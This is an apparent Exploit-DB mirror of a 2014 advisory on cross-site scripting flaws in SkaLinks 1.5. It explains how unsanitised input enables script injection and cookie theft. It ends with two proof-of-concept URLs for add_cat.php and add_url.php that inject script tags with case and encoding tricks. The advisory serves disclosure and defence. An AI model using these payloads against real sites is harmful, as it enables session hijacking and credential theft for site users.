exploit-db-mirror/platforms/php/webapps/34701.txt
Offensive Security a64816e686 Updated 09_20_2014
2014-09-20 04:43:56 +00:00

12 lines
709 B
Text
Executable file

source: http://www.securityfocus.com/bid/43430/info
SkaLinks is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
SkaLinks 1.5 is vulnerable; other versions may also be affected.
http://www.example.com/dir/add_cat.php?cat=1>&#039;><ScRiPt %0A%0D>alert(308857346746)%3B</ScRiPt>
http://www.example.com/dir/add_url.php?cat=1>&#039;><ScRiPt %0A%0D>alert(317287773544)%3B</ScRiPt>